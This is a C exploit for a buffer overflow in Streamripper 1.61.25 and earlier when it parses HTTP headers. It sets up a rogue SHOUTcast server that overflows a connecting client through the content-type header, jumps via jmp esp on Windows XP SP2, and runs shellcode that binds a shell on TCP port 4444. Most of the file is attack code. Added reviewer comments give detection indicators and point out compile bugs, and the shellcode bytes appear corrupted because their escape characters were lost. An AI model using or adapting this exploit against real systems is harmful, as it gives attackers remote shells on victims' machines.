
# Title : Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit 2
# Published : 2006-08-29
# Author : psylocn


/*   
 * name:		streamripper  <= 1.61.25 win32 remote exploit
 * 
 * bug by:		Ulf Harnhammar
 * status:		public 
 * exploit:		psylocn
 * payload:		portbind 4444
 * **********************************************************
 * K:>exploit.exe 80 0
 * [ public-release ]                                            
 *        streamripper  <= 1.61.25 remote exploit               
 *        exploit by psylocn 2006                               
 *        bug by Ulf Harnhammar                                 
 *                                                              
 * [+] server started!                                           
 * [+] server waits                                              
 *                   
 * 
 * go to next shell
 * K:>streamripper.exe http://127.0.0.1:80
 * Connecting...
 * 
 * on other shell
 * [+] client conneted!                                          
 * [+] exploit send check shell on port 4444 
 *
 * now connect to 127.0.0.1:4444  
*/

/* #define _WIN32 */  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
  
#ifdef _WIN32  
#include <winsock2.h>  
#pragma comment(lib, "ws2_32")  
#else  
#include <sys/types.h>  
#include <netinet/in.h>  
#include <sys/socket.h>  
#endif  

/*
 * Payload bytes delivered inside the rogue ICY response.  The header comment
 * above describes it as a port-bind payload on TCP/4444; main() copies it
 * verbatim into the response buffer right after the fixstack stub.
 *
 * NOTE(review): the byte escapes in this copy ("x29xc9...") appear to have
 * lost their escape characters during extraction, so the literal as printed
 * is not a byte-exact copy of what the author published.
 *
 * Defender note: the observable effect described by the author is a new TCP
 * listener on port 4444 inside the streamripper process after it connects to
 * a hostile server.  A media client opening a listening socket is a strong
 * host-level indicator; the over-long content-type header built in main() is
 * the corresponding network-level indicator.
 */
unsigned char portbindsc[] =   
"x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xaf"
"xbfxf8x2ax83xebxfcxe2xf4x53xd5x13x67x47x46x07xd5"
"x50xdfx73x46x8bx9bx73x6fx93x34x84x2fxd7xbex17xa1"
"xe0xa7x73x75x8fxbex13x63x24x8bx73x2bx41x8ex38xb3"
"x03x3bx38x5exa8x7ex32x27xaex7dx13xdex94xebxdcx02"
"xdax5ax73x75x8bxbex13x4cx24xb3xb3xa1xf0xa3xf9xc1"
"xacx93x73xa3xc3x9bxe4x4bx6cx8ex23x4ex24xfcxc8xa1"
"xefxb3x73x5axb3x12x73x6axa7xe1x90xa4xe1xb1x14x7a"
"x50x69x9ex79xc9xd7xcbx18xc7xc8x8bx18xf0xebx07xfa"
"xc7x74x15xd6x94xefx07xfcxf0x36x1dx4cx2ex52xf0x28"
"xfaxd5xfaxd5x7fxd7x21x23x5ax12xafxd5x79xecxabx79"
"xfcxecxbbx79xecxecx07xfaxc9xd7xe9x76xc9xecx71xcb"
"x3axd7x5cx30xdfx78xafxd5x79xd5xe8x7bxfax40x28x42"
"x0bx12xd6xc3xf8x40x2ex79xfax40x28x42x4axf6x7ex63"
"xf8x40x2ex7axfbxebxadxd5x7fx2cx90xcdxd6x79x81x7d"
"x50x69xadxd5x7fxd9x92x4exc9xd7x9bx47x26x5ax92x7a"
"xf6x96x34xa3x48xd5xbcxa3x4dx8ex38xd9x05x41xbax07"
"x51xfdxd4xb9x22xc5xc0x81x04x14x90x58x51x0cxeexd5"
"xdaxfbx07xfcxf4xe8xaax7bxfexeex92x2bxfexeexadx7b"
"x50x6fx90x87x76xbax36x79x50x69x92xd5x50x88x07xfa"
"x24xe8x04xa9x6bxdbx07xfcxfdx40x28x42x5fx35xfcx75"
"xfcx40x2exd5x7fxbfxf8x2axccxccxccxccxccxccxccxcc";  
 
/*
 * Fixed pieces of the rogue ICY/SHOUTcast response that main() assembles.
 *
 * part1 is the response prefix.  It stops right after the "content-type:"
 * header name, so everything main() places after it in the buffer is parsed
 * by the client as that header's value until part2 supplies the line break.
 * part2 holds the trailing headers and the blank line that ends the header
 * block; main() copies it at a fixed offset (3515) past the payload.
 * fixstack is a short stub copied directly after the address word
 * (buffer offset 3150 in main()); the author's comment calls it
 * "sub esp, 4097 + inc esp".
 *
 * NOTE(review): the "rn" and "x.." sequences in this copy appear to have
 * lost their escape characters during extraction.
 *
 * Detection note: the resulting content-type value is thousands of bytes
 * long and consists mostly of 0x90 filler (see the memset in main()); a
 * content-type header of that size is a usable network signature for this
 * response, independent of the payload carried.
 */
char part1[] = "ICY 200 OKrnicy-notice1:aaaaarn"
                   "icy-notice2:SHOUTcast Distributed Network Audio Server/FreeBSD v1.9.7<BR>rn"
                   "icy-name:Radioseven - www.radio.dern"
                   "icy-genre:Dance Trance Housern"
                   "icy-url:http://www.radio.dern"
                   "content-type:";                 //buffer to exploit: header left without a value
                   
char part2[] = "rn"
                   "icy-pub:1rn"
                   "icy-metaint:8192rn"
                   "icy-br:CCCCCCCrnrn";           //closes the content-type line, then ends the header block
                   
char fixstack[] = "x81xc4xffxefxffxffx44"; //sub esp, 4097 + inc esp (author's description)

/*
 * Victim-build table.  num is the index the user passes as argv[2] and is
 * echoed by Usage(); name is the label Usage() prints; jmpaddr is the
 * 4-byte value main() copies into the response at buffer offset 3146
 * (presumably the address that replaces the saved return address — the
 * author annotates row 0 as "jmp esp").  Row 1 is a placeholder the author
 * labels as a debugging entry.
 */
struct targets {
	int	num;
	char	name[50];
	long	jmpaddr;
}
target[] = {
	{ .num = 0, .name = "WinXP [sp2 ger] ", .jmpaddr = 0x7c951eed }, // jmp esp
	{ .num = 1, .name = "debug [testing] ", .jmpaddr = 0x41414141 },
};

/*
 * Print the command-line syntax and the target table, then terminate the
 * process with exit status 1.  Called from main() when arguments are missing
 * or the target index is out of range; it never returns.
 * The message literals are reproduced exactly as they appear in this copy.
 */
void Usage(){
	printf("Usage: exploit.exe port targetnn"
	       "Targets:nn");
	/* The guard mirrors the original: name is an array, so the test is
	 * always true and both table rows are listed. */
	for (int i = 0; i < 2 && target[i].name != 0; i++) {
		fprintf(stderr, " [%u] %sn", i, target[i].name);
	}
	exit(1);
}

/*
 * Entry point.  Runs a rogue ICY/SHOUTcast server: binds argv[1] on all
 * interfaces, waits for exactly one client, and answers it with a single
 * over-long response assembled from part1, the address word, fixstack,
 * portbindsc and part2.  The flaw being exercised is on the *client* side
 * (streamripper's HTTP header parsing, per the title); the host running this
 * program is the attacker and the connecting streamripper is the victim.
 *
 * Arguments: argv[1] = TCP port to listen on, argv[2] = index into target[]
 * (0 or 1).  Exits via Usage() on missing or out-of-range arguments.
 * Returns 0 on every path, including socket failures.
 *
 * Mitigation (defender): versions above the affected range named in the
 * title are not claimed to be affected; treat any stream server as untrusted
 * input and watch for the indicators noted below.
 */
int  main (int argc, char **argv)  {  
  
	char *host;  /* NOTE(review): unused */
	struct sockaddr_in my_addr;
    struct sockaddr_in their_addr;
    int sockfd,port,new_sock,sin_size=sizeof (their_addr);  
	   

	/* Response buffer.  Every offset used below (3146, 3150, 3515) is
	 * hard-coded to this size and to the single target listed in target[];
	 * nothing checks that the copies stay within sizeof buffer. */
	char buffer[3565];	 
  
#ifdef _WIN32  
	WSADATA wsa;  
#endif  
  

#ifdef _WIN32  
	 WSAStartup(MAKEWORD(2,0), &wsa);  
#endif  
  
	printf("[ public-release ]n");
	printf("tstreamripper  <= 1.61.25 remote exploit n");  
	printf("texploit by psylocn 2006n");  
	printf("tbug by Ulf Harnhammarnn"); 
	
	/* Target index is unsigned, so a negative argv[2] becomes a large value
	 * and is rejected by the > 1 test below. */
	unsigned long ntarget = 0;
	if (argc < 3) Usage(); 
    if ((ntarget = atoi(argv[2])) > 1) Usage(); 
 
    /* atoi() reports no error: a non-numeric argv[1] silently becomes port 0. */
    port = (unsigned short)atoi(argv[1]);

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {  
		printf("[-] socket errorn");  
		return 0;  
	}
	
    /* Listen on every interface, not just loopback, for the port given. */
    my_addr.sin_family = AF_INET;         
    my_addr.sin_port = htons(port);
    my_addr.sin_addr.s_addr = INADDR_ANY;   
	
	/* NOTE(review): "struct my_addr" is not a declared type; the cast is
	 * presumably meant to be (struct sockaddr *) as in the accept() call.
	 * SOCKET_ERROR, INVALID_SOCKET and closesocket() below are Winsock
	 * names used outside the _WIN32 guard, so the non-Windows branch of the
	 * includes is not self-contained. */
	if (bind (sockfd, (struct my_addr *) &my_addr, sizeof (my_addr)) == SOCKET_ERROR) {  
		printf("n[-] bind errorn");  
		return 0;  
	}
    else printf ("[+] server started!n");
    
    if (listen (sockfd, 3) == SOCKET_ERROR)  {  
		printf("n[-] listen errorn");  
		return 0;  
	}
	printf ("[+] server waitsn");
	
	/* Blocks until one streamripper client connects; only that client is served. */
	if ((new_sock = accept(sockfd, (struct sockaddr *)&their_addr,&sin_size))  == INVALID_SOCKET)  {  
		printf("n[-] accept errorn");  
		return 0;  
	}
 	else
 	printf ("[+] client conneted!n");
   
    /* Assemble the response:
     *   [0 .. ]          part1, ending in an unterminated "content-type:"
     *   [.. 3146)        0x90 filler (everything not overwritten below)
     *   [3146, 3150)     4-byte address word from target[ntarget]
     *   [3150, ..)       fixstack stub, then portbindsc immediately after
     *   [3515, ..)       part2, including its terminating NUL (sizeof, not strlen)
     * The last byte of buffer is left at 0 by the memset size.
     * Detection note: on the wire this is an "ICY 200 OK" response whose
     * content-type value runs to several kilobytes and is mostly 0x90. */
    memset ( buffer, 0x90, sizeof(buffer) - 1 );
    memcpy ( buffer, part1, strlen(part1) );
    memcpy ( buffer+3146, &target[ntarget].jmpaddr, 4);
    memcpy ( buffer+3150, fixstack,strlen(fixstack) );
    memcpy ( buffer+3150+strlen(fixstack),portbindsc, strlen(portbindsc));
    
    memcpy ( buffer+3515, part2, sizeof(part2) );
	
	/* Single send of the whole buffer; a short send is not handled. */
	if (send(new_sock, buffer,sizeof(buffer)-1, 0) < 0) {  
		printf("[-] send errorn");  
		return 0;  
	}
	/* NOTE(review): POSIX sleep() takes seconds, so this waits 2000 s on a
	 * non-Windows build; a millisecond value looks intended — confirm. */
	sleep(2000);
    printf("[+] exploit send check shell on port 4444n");  

	/* Only the listening socket is closed; new_sock is never closed. */
	closesocket(sockfd);  
#ifdef _WIN32 
  WSACleanup ();
#endif   
return 0;  
} 
